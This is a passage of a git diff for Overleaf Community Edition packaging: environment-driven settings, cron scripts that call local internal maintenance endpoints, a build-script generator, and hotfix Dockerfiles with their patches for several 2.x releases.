subnetRateLimiterDisabled: + process.env.SUBNET_RATE_LIMITER_DISABLED !== 'false', + }, + + // These credentials are used for authenticating api requests + // between services that may need to go over public channels + httpAuthUsers, + + // Should javascript assets be served minified or not. + useMinifiedJs: true, + + // Should static assets be sent with a header to tell the browser to cache + // them. This should be false in development where changes are being made, + // but should be set to true in production. + cacheStaticAssets: true, + + // If you are running Overleaf Community Edition over https, set this to true to send the + // cookie with a secure flag (recommended). + secureCookie: process.env.OVERLEAF_SECURE_COOKIE != null, + + // If you are running Overleaf Community Edition behind a proxy (like Apache, Nginx, etc) + // then set this to true to allow it to correctly detect the forwarded IP + // address and http/https protocol information.
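+ // + // For example (illustrative values): + // OVERLEAF_BEHIND_PROXY=true + // OVERLEAF_TRUSTED_PROXY_IPS=172.17.0.0/16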
+ + behindProxy: process.env.OVERLEAF_BEHIND_PROXY || false, + trustedProxyIps: process.env.OVERLEAF_TRUSTED_PROXY_IPS, + + // The amount of time, in milliseconds, until the (rolling) cookie session expires + cookieSessionLength: parseInt( + process.env.OVERLEAF_COOKIE_SESSION_LENGTH || 5 * 24 * 60 * 60 * 1000, // default 5 days + 10 + ), + + redisLockTTLSeconds: parseInt( + process.env.OVERLEAF_REDIS_LOCK_TTL_SECONDS || '60', + 10 + ), + + i18n: { + subdomainLang: { + www: { + lngCode: process.env.OVERLEAF_SITE_LANGUAGE || 'en', + url: siteUrl, + }, + }, + defaultLng: process.env.OVERLEAF_SITE_LANGUAGE || 'en', + }, + + currentImageName: process.env.TEX_LIVE_DOCKER_IMAGE, + + apis: { + web: { + url: 'http://127.0.0.1:3000', + user: httpAuthUser, + pass: httpAuthPass, + }, + project_history: { + sendProjectStructureOps: true, + url: 'http://127.0.0.1:3054', + }, + v1_history: { + url: process.env.V1_HISTORY_URL || 'http://127.0.0.1:3100/api', + user: 'staging', + pass: process.env.STAGING_PASSWORD, + requestTimeout: parseInt( + process.env.OVERLEAF_HISTORY_V1_HTTP_REQUEST_TIMEOUT || '300000', // default is 5min + 10 + ), + }, + }, + references: {}, + notifications: undefined, + + defaultFeatures: { + collaborators: -1, + dropbox: true, + versioning: true, + compileTimeout: parseIntOrFail(process.env.COMPILE_TIMEOUT || 180), + compileGroup: 'standard', + trackChanges: true, + references: true, + }, +} + +// # OPTIONAL CONFIGURABLE SETTINGS + +if (process.env.OVERLEAF_LEFT_FOOTER != null) { + try { + settings.nav.left_footer = JSON.parse(process.env.OVERLEAF_LEFT_FOOTER) + } catch (error) { + e = error + console.error('could not parse OVERLEAF_LEFT_FOOTER, not valid JSON') + } +} + +if (process.env.OVERLEAF_RIGHT_FOOTER != null) { + settings.nav.right_footer = process.env.OVERLEAF_RIGHT_FOOTER + try { + settings.nav.right_footer = JSON.parse(process.env.OVERLEAF_RIGHT_FOOTER) + } catch (error1) { + e = error1 + console.error('could not parse OVERLEAF_RIGHT_FOOTER, not valid JSON') + } +} + +if (process.env.OVERLEAF_HEADER_IMAGE_URL != null) { + settings.nav.custom_logo = process.env.OVERLEAF_HEADER_IMAGE_URL +} + +if (process.env.OVERLEAF_HEADER_EXTRAS != null) { + try { + settings.nav.header_extras = JSON.parse(process.env.OVERLEAF_HEADER_EXTRAS) + } catch (error2) { + e = error2 + console.error('could not parse OVERLEAF_HEADER_EXTRAS, not valid JSON') + } +} + +if (process.env.OVERLEAF_LOGIN_SUPPORT_TEXT != null) { + settings.nav.login_support_text = process.env.OVERLEAF_LOGIN_SUPPORT_TEXT +} + +if (process.env.OVERLEAF_LOGIN_SUPPORT_TITLE != null) { + settings.nav.login_support_title = process.env.OVERLEAF_LOGIN_SUPPORT_TITLE +} + +// Sending Email +// ------------- +// +// You must configure a mail server to be able to send invite emails from +// Overleaf Community Edition. The config settings are passed to nodemailer. 
See the nodemailer +// documentation for available options: +// +// http://www.nodemailer.com/docs/transports + +if (process.env.OVERLEAF_EMAIL_FROM_ADDRESS != null) { + settings.email = { + fromAddress: process.env.OVERLEAF_EMAIL_FROM_ADDRESS, + replyTo: process.env.OVERLEAF_EMAIL_REPLY_TO || '', + driver: process.env.OVERLEAF_EMAIL_DRIVER, + parameters: { + // AWS Creds + AWSAccessKeyID: process.env.OVERLEAF_EMAIL_AWS_SES_ACCESS_KEY_ID, + AWSSecretKey: process.env.OVERLEAF_EMAIL_AWS_SES_SECRET_KEY, + + // SMTP Creds + host: process.env.OVERLEAF_EMAIL_SMTP_HOST, + port: process.env.OVERLEAF_EMAIL_SMTP_PORT, + secure: parse(process.env.OVERLEAF_EMAIL_SMTP_SECURE), + ignoreTLS: parse(process.env.OVERLEAF_EMAIL_SMTP_IGNORE_TLS), + name: process.env.OVERLEAF_EMAIL_SMTP_NAME, + logger: process.env.OVERLEAF_EMAIL_SMTP_LOGGER === 'true', + }, + + textEncoding: process.env.OVERLEAF_EMAIL_TEXT_ENCODING, + template: { + customFooter: process.env.OVERLEAF_CUSTOM_EMAIL_FOOTER, + }, + } + + if (process.env.OVERLEAF_EMAIL_AWS_SES_REGION != null) { + settings.email.parameters.region = process.env.OVERLEAF_EMAIL_AWS_SES_REGION + } + + if ( + process.env.OVERLEAF_EMAIL_SMTP_USER != null || + process.env.OVERLEAF_EMAIL_SMTP_PASS != null + ) { + settings.email.parameters.auth = { + user: process.env.OVERLEAF_EMAIL_SMTP_USER, + pass: process.env.OVERLEAF_EMAIL_SMTP_PASS, + } + } + + if (process.env.OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH != null) { + settings.email.parameters.tls = { + rejectUnauthorized: parse( + process.env.OVERLEAF_EMAIL_SMTP_TLS_REJECT_UNAUTH + ), + } + } +} + +// i18n +if (process.env.OVERLEAF_LANG_DOMAIN_MAPPING != null) { + settings.i18n.subdomainLang = parse(process.env.OVERLEAF_LANG_DOMAIN_MAPPING) +} + +// Password Settings +// ----------- +// These restrict the passwords users can use when registering +// opts are from http://antelle.github.io/passfield +if ( + process.env.OVERLEAF_PASSWORD_VALIDATION_PATTERN || + process.env.OVERLEAF_PASSWORD_VALIDATION_MIN_LENGTH || + process.env.OVERLEAF_PASSWORD_VALIDATION_MAX_LENGTH +) { + settings.passwordStrengthOptions = { + pattern: process.env.OVERLEAF_PASSWORD_VALIDATION_PATTERN || 'aA$3', + length: { + min: process.env.OVERLEAF_PASSWORD_VALIDATION_MIN_LENGTH || 8, + max: process.env.OVERLEAF_PASSWORD_VALIDATION_MAX_LENGTH || 72, + }, + } +} + +// /References +// ----------- +if (process.env.OVERLEAF_ELASTICSEARCH_URL != null) { + settings.references.elasticsearch = { + host: process.env.OVERLEAF_ELASTICSEARCH_URL, + } +} + +// filestore +switch (process.env.OVERLEAF_FILESTORE_BACKEND) { + case 's3': + settings.filestore = { + backend: 's3', + stores: { + user_files: process.env.OVERLEAF_FILESTORE_USER_FILES_BUCKET_NAME, + template_files: + process.env.OVERLEAF_FILESTORE_TEMPLATE_FILES_BUCKET_NAME, + }, + s3: { + key: + process.env.OVERLEAF_FILESTORE_S3_ACCESS_KEY_ID || + process.env.AWS_ACCESS_KEY_ID, + secret: + process.env.OVERLEAF_FILESTORE_S3_SECRET_ACCESS_KEY || + process.env.AWS_SECRET_ACCESS_KEY, + endpoint: process.env.OVERLEAF_FILESTORE_S3_ENDPOINT, + pathStyle: process.env.OVERLEAF_FILESTORE_S3_PATH_STYLE === 'true', + region: + process.env.OVERLEAF_FILESTORE_S3_REGION || + process.env.AWS_DEFAULT_REGION, + }, + } + break + default: + settings.filestore = { + backend: 'fs', + stores: { + user_files: Path.join(DATA_DIR, 'user_files'), + template_files: Path.join(DATA_DIR, 'template_files'), + }, + } +} + +// With lots of incoming and outgoing HTTP connections to different services, +// sometimes long running, it is a good idea 
to increase the default number +// of sockets that Node will hold open. +const http = require('http') +http.globalAgent.maxSockets = 300 +const https = require('https') +https.globalAgent.maxSockets = 300 + +module.exports = settings diff --git a/server-ce/cron/deactivate-projects.sh b/server-ce/cron/deactivate-projects.sh new file mode 100755 index 0000000..fab0fbf --- /dev/null +++ b/server-ce/cron/deactivate-projects.sh @@ -0,0 +1,28 @@ +#!/usr/bin/env bash + +set -eux + +echo "-------------------------" +echo "Deactivating old projects" +echo "-------------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping old project deactivation due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -v -X POST \ + -u "${USER}:${PASS}" \ + -H "Content-Type: application/json" \ + -d '{"numberOfProjectsToArchive":"720","ageOfProjects":"7"}' \ + "${WEB_URL}/internal/deactivateOldProjects" + +echo "Done." diff --git a/server-ce/cron/delete-projects.sh b/server-ce/cron/delete-projects.sh new file mode 100755 index 0000000..e1ea5ac --- /dev/null +++ b/server-ce/cron/delete-projects.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +set -eux + +echo "-------------------------" +echo "Expiring deleted projects" +echo "-------------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping project expiration due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -X POST -v -u "${USER}:${PASS}" \ + "${WEB_URL}/internal/expire-deleted-projects-after-duration" + +echo "Done." diff --git a/server-ce/cron/delete-users.sh b/server-ce/cron/delete-users.sh new file mode 100755 index 0000000..fe97bff --- /dev/null +++ b/server-ce/cron/delete-users.sh @@ -0,0 +1,25 @@ +#!/usr/bin/env bash + +set -eux + +echo "----------------------" +echo "Expiring deleted users" +echo "----------------------" +date + +ENABLE_CRON_RESOURCE_DELETION=$(cat /etc/container_environment/ENABLE_CRON_RESOURCE_DELETION) + +if [[ "${ENABLE_CRON_RESOURCE_DELETION:-null}" != "true" ]]; then + echo "Skipping user expiration due to ENABLE_CRON_RESOURCE_DELETION not set to true" + exit 0 +fi + +WEB_URL='http://127.0.0.1:3000' + +USER=$(cat /etc/container_environment/WEB_API_USER) +PASS=$(cat /etc/container_environment/WEB_API_PASSWORD) + +curl -X POST -v -u "${USER}:${PASS}" \ + "${WEB_URL}/internal/expire-deleted-users-after-duration" + +echo "Done." 
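All three resource-deletion cron jobs above share one shape: read the internal API credentials that the image publishes under /etc/container_environment, then POST to a private endpoint on the local web service using HTTP basic auth. The following Node sketch restates the deactivate-old-projects call for orientation; the endpoint, port, and payload are copied from deactivate-projects.sh above, while the readEnvFile helper is purely illustrative.

const fs = require('fs')
const http = require('http')

// Illustrative helper: the base image exposes each variable as a file.
const readEnvFile = name =>
  fs.readFileSync(`/etc/container_environment/${name}`, 'utf8').trim()

const user = readEnvFile('WEB_API_USER')
const pass = readEnvFile('WEB_API_PASSWORD')

// Same endpoint and payload as server-ce/cron/deactivate-projects.sh.
const body = JSON.stringify({
  numberOfProjectsToArchive: '720',
  ageOfProjects: '7',
})

const req = http.request(
  {
    host: '127.0.0.1',
    port: 3000,
    path: '/internal/deactivateOldProjects',
    method: 'POST',
    auth: `${user}:${pass}`, // HTTP basic auth, as curl -u does
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': Buffer.byteLength(body),
    },
  },
  res => console.log('status:', res.statusCode)
)
req.on('error', err => {
  console.error(err)
  process.exit(1)
})
req.end(body)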
diff --git a/server-ce/cron/project-history-periodic-flush.sh b/server-ce/cron/project-history-periodic-flush.sh new file mode 100755 index 0000000..76feae4 --- /dev/null +++ b/server-ce/cron/project-history-periodic-flush.sh @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +set -eux + +echo "---------------------------" +echo "Flush project-history queue" +echo "---------------------------" +date + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/flush/old?timeout=3600000&limit=5000&background=1" diff --git a/server-ce/cron/project-history-retry-hard.sh b/server-ce/cron/project-history-retry-hard.sh new file mode 100755 index 0000000..651a661 --- /dev/null +++ b/server-ce/cron/project-history-retry-hard.sh @@ -0,0 +1,12 @@ +#!/usr/bin/env bash + +set -eux + +echo "-----------------------------------" +echo "Retry project-history errors (hard)" +echo "-----------------------------------" +date + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=hard&timeout=3600000&limit=10000" diff --git a/server-ce/cron/project-history-retry-soft.sh b/server-ce/cron/project-history-retry-soft.sh new file mode 100755 index 0000000..70c5970 --- /dev/null +++ b/server-ce/cron/project-history-retry-soft.sh @@ -0,0 +1,11 @@ +#!/usr/bin/env bash + +set -eux + +echo "-----------------------------------" +echo "Retry project-history errors (soft)" +echo "-----------------------------------" + +PROJECT_HISTORY_URL='http://127.0.0.1:3054' + +curl -X POST "${PROJECT_HISTORY_URL}/retry/failures?failureType=soft&timeout=3600000&limit=10000" diff --git a/server-ce/genScript.js b/server-ce/genScript.js new file mode 100644 index 0000000..c433f3a --- /dev/null +++ b/server-ce/genScript.js @@ -0,0 +1,42 @@ +const services = require('./services') + +console.log('#!/bin/bash') +console.log('set -ex') + +switch (process.argv.pop()) { + case 'install': + console.log('npm install --omit=dev') + break + case 'compile': + for (const service of services) { + console.log('pushd', `services/${service.name}`) + switch (service.name) { + case 'web': + // precompile pug in background + console.log('npm run precompile-pug &') + console.log('pug_precompile=$!') + + // Avoid downloading Cypress + console.log('export CYPRESS_INSTALL_BINARY=0') + + // install webpack and frontend dependencies + console.log('npm install --include=dev') + // run webpack + console.log('npm run webpack:production') + // uninstall webpack and frontend dependencies + console.log('npm install --omit=dev') + + // Wait for pug precompile to finish + console.log('wait "$pug_precompile"') + break + default: + console.log(`echo ${service.name} does not require compilation`) + } + console.log('popd') + } + break + default: + console.error('unknown command') + console.log('exit 101') + process.exit(101) +} diff --git a/server-ce/hotfix/2.0.1/Dockerfile b/server-ce/hotfix/2.0.1/Dockerfile new file mode 100644 index 0000000..12a8537 --- /dev/null +++ b/server-ce/hotfix/2.0.1/Dockerfile @@ -0,0 +1,13 @@ +FROM sharelatex/sharelatex:2.0.0 + + +# Patch 1: Fixes project deletion (https://github.com/overleaf/overleaf/issues/644) +ADD disable_project_history.patch /etc/sharelatex/disable_project_history.patch +RUN cd /etc/sharelatex && \ + patch < disable_project_history.patch + + +# Patch 2: Fixes admin creation via CLI (https://github.com/overleaf/overleaf/issues/647) +ADD create_and_destroy_users.patch /var/www/sharelatex/tasks/create_and_destroy_users.patch +RUN cd 
/var/www/sharelatex/tasks/ && \ + patch < create_and_destroy_users.patch diff --git a/server-ce/hotfix/2.0.1/create_and_destroy_users.patch b/server-ce/hotfix/2.0.1/create_and_destroy_users.patch new file mode 100644 index 0000000..bb2dc16 --- /dev/null +++ b/server-ce/hotfix/2.0.1/create_and_destroy_users.patch @@ -0,0 +1,11 @@ +--- CreateAndDestoryUsers.coffee ++++ CreateAndDestoryUsers.coffee +@@ -21,7 +21,7 @@ module.exports = (grunt) -> + user.save (error) -> + throw error if error? + ONE_WEEK = 7 * 24 * 60 * 60 # seconds +- OneTimeTokenHandler.getNewToken user._id, { expiresIn: ONE_WEEK }, (err, token)-> ++ OneTimeTokenHandler.getNewToken "password", { expiresIn: ONE_WEEK, email:user.email, user_id: user._id.toString() }, (err, token)-> + return next(err) if err? + + console.log "" diff --git a/server-ce/hotfix/2.0.1/disable_project_history.patch b/server-ce/hotfix/2.0.1/disable_project_history.patch new file mode 100644 index 0000000..830570a --- /dev/null +++ b/server-ce/hotfix/2.0.1/disable_project_history.patch @@ -0,0 +1,11 @@ +--- settings.coffee ++++ settings.coffee +@@ -200,6 +200,8 @@ settings = + # is not available + v1: + url: "" ++ project_history: ++ enabled: false + references:{} + notifications:undefined + diff --git a/server-ce/hotfix/2.0.2/1-anon-upload.patch b/server-ce/hotfix/2.0.2/1-anon-upload.patch new file mode 100644 index 0000000..7503790 --- /dev/null +++ b/server-ce/hotfix/2.0.2/1-anon-upload.patch @@ -0,0 +1,60 @@ +--- UploadsRouter.js ++++ UploadsRouter.js +@@ -1,13 +1,3 @@ +-/* eslint-disable +- no-unused-vars, +-*/ +-// TODO: This file was created by bulk-decaffeinate. +-// Fix any style issues and re-enable lint. +-/* +- * decaffeinate suggestions: +- * DS102: Remove unnecessary code created because of implicit returns +- * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md +- */ + const AuthorizationMiddleware = require('../Authorization/AuthorizationMiddleware') + const AuthenticationController = require('../Authentication/AuthenticationController') + const ProjectUploadController = require('./ProjectUploadController') +@@ -28,18 +18,30 @@ module.exports = { + ProjectUploadController.uploadProject + ) + +- return webRouter.post( +- '/Project/:Project_id/upload', +- RateLimiterMiddleware.rateLimit({ +- endpointName: 'file-upload', +- params: ['Project_id'], +- maxRequests: 200, +- timeInterval: 60 * 30 +- }), +- AuthenticationController.requireLogin(), +- AuthorizationMiddleware.ensureUserCanWriteProjectContent, +- ProjectUploadController.multerMiddleware, +- ProjectUploadController.uploadFile +- ) ++ const fileUploadEndpoint = '/Project/:Project_id/upload' ++ const fileUploadRateLimit = RateLimiterMiddleware.rateLimit({ ++ endpointName: 'file-upload', ++ params: ['Project_id'], ++ maxRequests: 200, ++ timeInterval: 60 * 30 ++ }) ++ if (Settings.allowAnonymousReadAndWriteSharing) { ++ webRouter.post( ++ fileUploadEndpoint, ++ fileUploadRateLimit, ++ AuthorizationMiddleware.ensureUserCanWriteProjectContent, ++ ProjectUploadController.multerMiddleware, ++ ProjectUploadController.uploadFile ++ ) ++ } else { ++ webRouter.post( ++ fileUploadEndpoint, ++ fileUploadRateLimit, ++ AuthenticationController.requireLogin(), ++ AuthorizationMiddleware.ensureUserCanWriteProjectContent, ++ ProjectUploadController.multerMiddleware, ++ ProjectUploadController.uploadFile ++ ) ++ } + } + } diff --git a/server-ce/hotfix/2.0.2/2-read-only-access.patch b/server-ce/hotfix/2.0.2/2-read-only-access.patch new file mode 100644 index 
0000000..246cc3e --- /dev/null +++ b/server-ce/hotfix/2.0.2/2-read-only-access.patch @@ -0,0 +1,11 @@ +--- TokenAccessHandler.js ++++ TokenAccessHandler.js +@@ -255,7 +255,7 @@ const TokenAccessHandler = { + + getV1DocPublishedInfo(token, callback) { + // default to allowing access +- if (!Settings.apis || !Settings.apis.v1) { ++ if (!Settings.apis.v1 || !Settings.apis.v1.url) { + return callback(null, { allow: true }) + } + V1Api.request( diff --git a/server-ce/hotfix/2.0.2/3-url-linking-1.patch b/server-ce/hotfix/2.0.2/3-url-linking-1.patch new file mode 100644 index 0000000..1738098 --- /dev/null +++ b/server-ce/hotfix/2.0.2/3-url-linking-1.patch @@ -0,0 +1,11 @@ +--- Features.js ++++ Features.js +@@ -53,6 +53,8 @@ module.exports = Features = { + return Settings.apis.references.url != null + case 'saml': + return Settings.enableSaml ++ case 'link-url': ++ return Settings.apis.linkedUrlProxy && Settings.apis.linkedUrlProxy.url + default: + throw new Error(`unknown feature: ${feature}`) + } diff --git a/server-ce/hotfix/2.0.2/4-url-linking-2.patch b/server-ce/hotfix/2.0.2/4-url-linking-2.patch new file mode 100644 index 0000000..587a8e6 --- /dev/null +++ b/server-ce/hotfix/2.0.2/4-url-linking-2.patch @@ -0,0 +1,20 @@ +--- new-file-modal.pug ++++ new-file-modal.pug +@@ -21,11 +21,12 @@ script(type='text/ng-template', id='newFileModalTemplate') + i.fa.fa-fw.fa-folder-open + | + | From Another Project +- li(ng-class="type == 'url' ? 'active' : null") +- a(href, ng-click="type = 'url'") +- i.fa.fa-fw.fa-globe +- | +- | From External URL ++ if hasFeature('link-url') ++ li(ng-class="type == 'url' ? 'active' : null") ++ a(href, ng-click="type = 'url'") ++ i.fa.fa-fw.fa-globe ++ | ++ | From External URL + != moduleIncludes("newFileModal:selector", locals) + + td(class="modal-new-file--body modal-new-file--body-{{type}}") diff --git a/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch b/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch new file mode 100644 index 0000000..198ee03 --- /dev/null +++ b/server-ce/hotfix/2.0.2/5-disable-analytics-1.patch @@ -0,0 +1,26 @@ +--- AnalyticsController.js ++++ AnalyticsController.js +@@ -3,9 +3,13 @@ const Errors = require('../Errors/Errors') + const AuthenticationController = require('../Authentication/AuthenticationController') + const InstitutionsAPI = require('../Institutions/InstitutionsAPI') + const GeoIpLookup = require('../../infrastructure/GeoIpLookup') ++const Features = require('../../infrastructure/Features') + + module.exports = { + updateEditingSession(req, res, next) { ++ if (!Features.hasFeature('analytics')) { ++ return res.send(204) ++ } + const userId = AuthenticationController.getLoggedInUserId(req) + const { projectId } = req.params + let countryCode = null +@@ -28,6 +32,9 @@ module.exports = { + }, + + recordEvent(req, res, next) { ++ if (!Features.hasFeature('analytics')) { ++ return res.send(204) ++ } + const userId = + AuthenticationController.getLoggedInUserId(req) || req.sessionID + AnalyticsManager.recordEvent(userId, req.params.event, req.body, error => diff --git a/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch b/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch new file mode 100644 index 0000000..9fb41c1 --- /dev/null +++ b/server-ce/hotfix/2.0.2/6-disable-analytics-2.patch @@ -0,0 +1,10 @@ +--- Features.js ++++ Features.js +@@ -41,6 +41,7 @@ module.exports = Features = { + case 'templates-server-pro': + return Settings.overleaf == null + case 'affiliations': ++ case 'analytics': + // Checking both properties is needed for 
the time being to allow + // enabling the feature in web-api and disabling in Server Pro + // see https://github.com/overleaf/web-internal/pull/2127 diff --git a/server-ce/hotfix/2.0.2/Dockerfile b/server-ce/hotfix/2.0.2/Dockerfile new file mode 100644 index 0000000..7a75ed9 --- /dev/null +++ b/server-ce/hotfix/2.0.2/Dockerfile @@ -0,0 +1,31 @@ +FROM sharelatex/sharelatex:2.0.1 + + +# Patch 1: Fixes anonymous link sharing +ADD 1-anon-upload.patch /var/www/sharelatex/web/app/src/Features/Uploads/1-anon-upload.patch +RUN cd /var/www/sharelatex/web/app/src/Features/Uploads/ && \ + patch < 1-anon-upload.patch + + +# Patch 2: Fixes read-only access +ADD 2-read-only-access.patch /var/www/sharelatex/web/app/src/Features/TokenAccess/3-read-only-access.patch +RUN cd /var/www/sharelatex/web/app/src/Features/TokenAccess/ && \ + patch < 3-read-only-access.patch + + +# Patch 3: Fixes url linking +ADD 3-url-linking-1.patch /var/www/sharelatex/web/app/src/infrastructure/6-url-linking-1.patch +RUN cd /var/www/sharelatex/web/app/src/infrastructure/ && \ + patch < 6-url-linking-1.patch +ADD 4-url-linking-2.patch /var/www/sharelatex/web/app/views/project/editor/7-url-linking-2.patch +RUN cd /var/www/sharelatex/web/app/views/project/editor/ && \ + patch < 7-url-linking-2.patch + + +# Patch 4: Disables analytics +ADD 5-disable-analytics-1.patch /var/www/sharelatex/web/app/src/Features/Analytics/8-disable-analytics-1.patch +RUN cd /var/www/sharelatex/web/app/src/Features/Analytics/ && \ + patch < 8-disable-analytics-1.patch +ADD 6-disable-analytics-2.patch /var/www/sharelatex/web/app/src/infrastructure/9-disable-analytics-2.patch +RUN cd /var/www/sharelatex/web/app/src/infrastructure/ && \ + patch < 9-disable-analytics-2.patch diff --git a/server-ce/hotfix/2.1.1/Dockerfile b/server-ce/hotfix/2.1.1/Dockerfile new file mode 100644 index 0000000..313c596 --- /dev/null +++ b/server-ce/hotfix/2.1.1/Dockerfile @@ -0,0 +1,8 @@ +FROM sharelatex/sharelatex:2.1.0 + +# Patch: defines recaptcha config to fix share-related issues +# - https://github.com/overleaf/overleaf/issues/684 +ADD add-recaptcha-config.patch /etc/sharelatex/add-recaptcha-config.patch +RUN cd /etc/sharelatex/ && \ + patch < add-recaptcha-config.patch + diff --git a/server-ce/hotfix/2.1.1/add-recaptcha-config.patch b/server-ce/hotfix/2.1.1/add-recaptcha-config.patch new file mode 100644 index 0000000..cdca537 --- /dev/null +++ b/server-ce/hotfix/2.1.1/add-recaptcha-config.patch @@ -0,0 +1,14 @@ +--- a/settings.coffee ++++ b/settings.coffee +@@ -180,6 +180,11 @@ settings = + # cookie with a secure flag (recommended). + secureCookie: process.env["SHARELATEX_SECURE_COOKIE"]? + ++ recaptcha: ++ disabled: ++ invite: true ++ register: true ++ + # If you are running ShareLaTeX behind a proxy (like Apache, Nginx, etc) + # then set this to true to allow it to correctly detect the forwarded IP + # address and http/https protocol information. 
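For readers cross-referencing this CoffeeScript-era override with the settings.js format that ships in this commit, the same change would look roughly as follows. This is a sketch, not part of any image; only the key names are taken from add-recaptcha-config.patch above.

// Sketch: disable the invite and register captchas, mirroring the keys
// added by add-recaptcha-config.patch (illustrative, not shipped code).
settings.recaptcha = {
  disabled: {
    invite: true,
    register: true,
  },
}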
diff --git a/server-ce/hotfix/2.3.1/Dockerfile b/server-ce/hotfix/2.3.1/Dockerfile new file mode 100644 index 0000000..36f136a --- /dev/null +++ b/server-ce/hotfix/2.3.1/Dockerfile @@ -0,0 +1,7 @@ +FROM sharelatex/sharelatex:2.3.0 + + +# Patch: Fixes NPE when invoking synctex (https://github.com/overleaf/overleaf/issues/756) +ADD check-clsi-setting-exists.patch /var/www/sharelatex/clsi/app/js/check-clsi-setting-exists.patch +RUN cd /var/www/sharelatex/clsi/app/js && \ + patch < check-clsi-setting-exists.patch diff --git a/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch b/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch new file mode 100644 index 0000000..6f6535b --- /dev/null +++ b/server-ce/hotfix/2.3.1/check-clsi-setting-exists.patch @@ -0,0 +1,11 @@ +--- a/app/js/CompileManager.js ++++ b/app/js/CompileManager.js +@@ -536,7 +536,7 @@ module.exports = CompileManager = { + compileName, + command, + directory, +- Settings.clsi != null ? Settings.clsi.docker.image : undefined, ++ Settings.clsi && Settings.clsi.docker ? Settings.clsi.docker.image : undefined, + timeout, + {}, + function(error, output) { diff --git a/server-ce/hotfix/2.4.1/Dockerfile b/server-ce/hotfix/2.4.1/Dockerfile new file mode 100644 index 0000000..d765551 --- /dev/null +++ b/server-ce/hotfix/2.4.1/Dockerfile @@ -0,0 +1,6 @@ +FROM sharelatex/sharelatex:2.4.0 + + +# Patch: Fixes missing dependencies on web startup (https://github.com/overleaf/overleaf/issues/767) +RUN cd /var/www/sharelatex/web && \ + npm install i18next@^19.6.3 i18next-fs-backend@^1.0.7 i18next-http-middleware@^3.0.2 diff --git a/server-ce/hotfix/2.4.2/Dockerfile b/server-ce/hotfix/2.4.2/Dockerfile new file mode 100644 index 0000000..640eea7 --- /dev/null +++ b/server-ce/hotfix/2.4.2/Dockerfile @@ -0,0 +1,10 @@ +FROM sharelatex/sharelatex:2.4.1 + + +# Patch: Fixes anonymous read/write sharing +COPY anonymous-metadata.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < anonymous-metadata.patch + +# Patch: Fixes left footer with html text +COPY left-footer-skip-translation.patch ${baseDir} +RUN cd ${baseDir} && patch -p0 < left-footer-skip-translation.patch diff --git a/server-ce/hotfix/2.4.2/anonymous-metadata.patch b/server-ce/hotfix/2.4.2/anonymous-metadata.patch new file mode 100644 index 0000000..ea041ab --- /dev/null +++ b/server-ce/hotfix/2.4.2/anonymous-metadata.patch @@ -0,0 +1,43 @@ +--- /var/www/sharelatex/web/app/src/router.js 2020-09-14 20:21:39.741433000 +0000 ++++ /var/www/sharelatex/web/app/src/router.js 2020-09-14 20:13:08.000000000 +0000 +@@ -607,16 +607,17 @@ + ProjectDownloadsController.downloadMultipleProjects + ) + ++ console.log(`allowAnonymousReadAndWriteSharing: ${Settings.allowAnonymousReadAndWriteSharing}`) + webRouter.get( + '/project/:project_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? (req, res, next) => { next() } : AuthenticationController.requireLogin(), + MetaController.getMetadata +- ) ++ ) + webRouter.post( + '/project/:project_id/doc/:doc_id/metadata', + AuthorizationMiddleware.ensureUserCanReadProject, +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? 
(req, res, next) => { next() } : AuthenticationController.requireLogin(), + MetaController.broadcastMetadataForDoc + ) + privateApiRouter.post( +--- /var/www/sharelatex/web/app/src/Features/Contacts/ContactRouter.js 2020-09-14 20:21:52.243779000 +0000 ++++ /var/www/sharelatex/web/app/src/Features/Contacts/ContactRouter.js 2020-09-14 20:13:08.000000000 +0000 +@@ -5,6 +5,8 @@ + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ ++const Settings = require('settings-sharelatex') ++ + const AuthenticationController = require('../Authentication/AuthenticationController') + const ContactController = require('./ContactController') + +@@ -12,7 +14,7 @@ + apply(webRouter, apiRouter) { + return webRouter.get( + '/user/contacts', +- AuthenticationController.requireLogin(), ++ Settings.allowAnonymousReadAndWriteSharing ? (req, res, next) => { next() } : AuthenticationController.requireLogin(), + ContactController.getContacts + ) + } diff --git a/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch b/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch new file mode 100644 index 0000000..ee6e33a --- /dev/null +++ b/server-ce/hotfix/2.4.2/left-footer-skip-translation.patch @@ -0,0 +1,12 @@ + +--- /var/www/sharelatex/web/app/views/layout/footer.pug ++++ 